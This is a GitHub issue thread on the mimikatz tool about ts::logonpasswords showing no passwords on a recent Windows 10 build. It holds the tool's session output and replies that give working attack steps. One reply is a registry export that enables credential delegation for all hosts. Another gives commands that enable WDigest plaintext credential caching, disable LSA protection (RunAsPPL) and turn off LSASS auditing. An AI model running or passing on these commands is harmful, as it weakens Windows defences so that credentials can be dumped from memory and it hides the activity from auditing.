search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
18.98k stars 3.62k forks source link

ts::logonpasswords no passwords in latest win10 build #428

Open thatssorude opened 1 year ago

thatssorude commented 1 year ago 
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # ts::logonpasswords
!!! Warning: false positives can be listed !!!

   Domain      : DESKTOP-BSBG8R2
   UserName    : admin
   Password/Pin:

mimikatz # version

mimikatz 2.2.0 (arch x64)
Windows NT 10.0 build 19045 (arch x64)
msvc 150030729 207

mimikatz #

Maybe offsets changes?Please have a look The code is too complicated to me and i cant figure out only by myself

jasontomasi commented 9 months ago 
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # ts::logonpasswords
!!! Warning: false positives can be listed !!!

   Domain      : DESKTOP-BSBG8R2
   UserName    : admin
   Password/Pin:

mimikatz # version

mimikatz 2.2.0 (arch x64)
Windows NT 10.0 build 19045 (arch x64)
msvc 150030729 207

mimikatz #

Maybe offsets changes?Please have a look The code is too complicated to me and i cant figure out only by myself

Windows 10 doesn't save the credentials in memory anymore. You can change the behaviour by modifying the registry, or by using the Local Group Policy Editor (for non-domain PCs), or the Active Directory Group Policy Editor (for domain PCs):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation] "AllowProtectedCreds"=dword:00000001 "AllowSavedCredentials"=dword:00000001 "ConcatenateDefaults_AllowSaved"=dword:00000000 "RestrictedRemoteAdministration"=dword:00000000 "DenySavedCredentials"=dword:00000000 "ConcatenateDefaults_DenySaved"=dword:00000000 "DenyFreshCredentials"=dword:00000000 "ConcatenateDefaults_DenyFresh"=dword:00000000 "DenyDefaultCredentials"=dword:00000000 "ConcatenateDefaults_DenyDefault"=dword:00000000 "AllowSavedCredentialsWhenNTLMOnly"=dword:00000000 "ConcatenateDefaults_AllowSavedNTLMOnly"=dword:00000000 "AllowFreshCredentialsWhenNTLMOnly"=dword:00000000 "ConcatenateDefaults_AllowFreshNTLMOnly"=dword:00000000 "AllowFreshCredentials"=dword:00000001 "ConcatenateDefaults_AllowFresh"=dword:00000000 "AllowDefaultCredentials"=dword:00000001 "ConcatenateDefaults_AllowDefault"=dword:00000000 "AllowDefCredentialsWhenNTLMOnly"=dword:00000000 "ConcatenateDefaults_AllowDefNTLMOnly"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\AllowDefaultCredentials] "1"="*"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\AllowFreshCredentials] "1"="*"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\AllowSavedCredentials] "1"="*"

sec13b commented 1 week ago

try :

  1. powershell New-ItemProperty -Path 'Registry::HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest' -Name UseLogonCredential -PropertyType Dword -Value 1 -Force

2.cmd.exe Disabling LSA protection mode and LSASS audit reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL /t REG_DWORD /d 0 /f reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe" /v AuditLevel /t REG_DWORD /d 0 /f